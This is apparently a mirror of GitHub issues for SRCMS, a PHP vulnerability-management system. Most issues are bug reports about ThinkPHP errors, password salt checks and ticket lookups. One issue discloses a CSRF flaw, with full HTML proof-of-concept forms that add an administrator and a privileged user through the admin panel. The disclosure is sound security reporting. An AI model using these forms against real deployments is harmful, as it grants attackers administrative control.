martinzhou2015 / srcms Goto Github PK
View Code? Open in Web Editor NEWSRCMS企业应急响应与缺陷管理系统
SRCMS企业应急响应与缺陷管理系统
普通用户不能更改自己的信息,报出的错误是非法请求
change password
class HallController extends Controller{
public function index($key="")
{
if($key == ""){
$model = M('member');
}else{
$where['title'] = array('like',"%$key%");
$where['name'] = array('like',"%$key%");
$where['_logic'] = 'or';
$model = M('member')->where($where);
}
$user = $model->limit($Page->firstRow.','.$Page->listRows)->where($where)->order('jifen ASC')->where('type=1')->select();
$xuhao = 1;
$tmodel= M('setting');
$title = $tmodel->where('id=1')->select();
$this->assign('title', $title);
$this -> assign('xuhao',$xuhao);
$this->assign('user',getSortedCategory($user));
$this->display();
}
}
undefined variable $Page.
复现过程:
testbug
\Admin\Controller\ManagerController.class.php , line 29, "$model = M('member')->where($where);" , 'member' should be 'manager'. : )
.<
Too few arguments to function I(), 0 passed in /Applications/XAMPP/xamppfiles/htdocs/Application/Admin/Controller/SettingController.class.php on line 41 and at least 1 expected
错误位置
FILE: /Applications/XAMPP/xamppfiles/htdocs/ThinkPHP/Common/functions.php LINE: 271
TRACE
#0 /Applications/XAMPP/xamppfiles/htdocs/Application/Admin/Controller/SettingController.class.php(41): I()
#1 [internal function]: Admin\Controller\SettingController->update()
#2 /Applications/XAMPP/xamppfiles/htdocs/ThinkPHP/Library/Think/App.class.php(173): ReflectionMethod->invoke(Object(Admin\Controller\SettingController))
后台更改网站相关配置时显示配置更新失败,但是数据库中的信息已经更改,前台的却没有更改
Hi all,
为了进一步完善SRCMS的功能,带来更好的安装和用户体验,SRCMS V3系列已经着手开发,考虑到开发版本更新频率较为频繁,且功能变动多,因此SRCMS V3开发版本将会托管在新的SRCMS-dev项目中,您可以通过以下地址获取到最新版本的SRCMS V3开发版本:
https://github.com/martinzhou2015/SRCMS-dev
接下来的开发计划,包括后端代码重写(将使用的ThinkPHP 3.2.3框架,升级到ThinkPHP5.0或使用其他框架),功能的优化和完善等。V3正式版本的开发计划将会在本Issue中进行跟踪。
如果您有任何建议或意见欢迎在下方留言,或通过Email联系到我。
Martin
你好,请问你这个Thinkphp用的哪个版本的?
更新个人信息,提交任何内容都提示非法请求
如题
问题描述:
//验证原密码 $user = $member->where(array('id'=>$id,'password'=>$oldpassword))->find(); if(!$user) { $this->error('旧密码校验失败 :(') ;
因为V1.7新版本存储密码时,添加了salt字符防护,此处校验逻辑未做修改,导致出现问题。
问题解决:
· 优化此处处理逻辑,排查其他涉及密码的部分。
在测试的时候发现生成工单根据session_id查询不正确,具体表现在查询A工单可能得到B工单的内容。是个bug?
有联系方式吗? 请提供一个
Too few arguments to function I(), 0 passed in /usr/local/nginx/html/Application/User/Controller/InfoController.class.php on line 29 and at least 1 expected
这是什么情况,提交更新普通用户信息的时候,提示这个问题,求解答
上传的图片路径貌似不对,windows系统
大佬 admin.php页面用提供的Admin/Admin用户名密码无法登陆啊!!!
After the administrator logged in, open the following two page
poc:
add_admin.html
<html>
<form action="http://127.0.0.1/admin.php?m=Admin&c=manager&a=add" method="post">
<div class="form-group">
<label>用户名</label>
<input class="form-control" type="text" name="username" value="csrf">
</div>
<div class="form-group">
<label>邮箱</label>
<input class="form-control" type="text" name="email" value="[email protected]">
</div>
<div class="form-group">
<label>密码</label>
<input class="form-control" type="password" name="password" value="123456">
</div>
<div class="form-group">
<label>确认密码</label>
<input class="form-control" type="password" name="repassword" value="123456">
</div>
<div class="form-group">
<button class="btn btn-success" type="submit" >添加</button>
</div>
</form>
</html>
add_user.html
<html>
<form action="http://127.0.0.1/admin.php?m=Admin&c=member&a=add" method="post">
<div class="form-group">
<label>用户名</label>
<input class="form-control" type="text" name="username" value="test">
</div>
<div class="form-group">
<label>邮箱</label>
<input class="form-control" type="text" name="email" value="[email protected]">
</div>
<div class="form-group">
<label>密码</label>
<input class="form-control" type="password" name="password" value="123456">
</div>
<div class="form-group">
<label>确认密码</label>
<input class="form-control" type="password" name="repassword" value="123456">
</div>
<div class="form-group">
<label>用户等级</label>
<label class="radio-inline">
<input type="radio" name="type" id="type" value="1" >路人
</label>
<label class="radio-inline">
<input type="radio" name="type" id="type" value="2" >实习白帽子
</label>
<label class="radio-inline">
<input type="radio" name="type" id="type" value="3" >普通白帽子
</label>
<label class="radio-inline">
<input type="radio" name="type" id="type" checked="checked" value="4" >核心白帽子
</label>
</div>
<div class="form-group">
<label>用户状态</label>
<label class="radio-inline">
<input type="radio" name="status" id="status" value="0">禁止登陆
</label>
<label class="radio-inline">
<input type="radio" name="status" id="status" value="1" checked="checked">正常
</label>
</div>
<div class="form-group">
<button class="btn btn-success" type="submit" >添加</button>
</div>
</form>
</html>
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.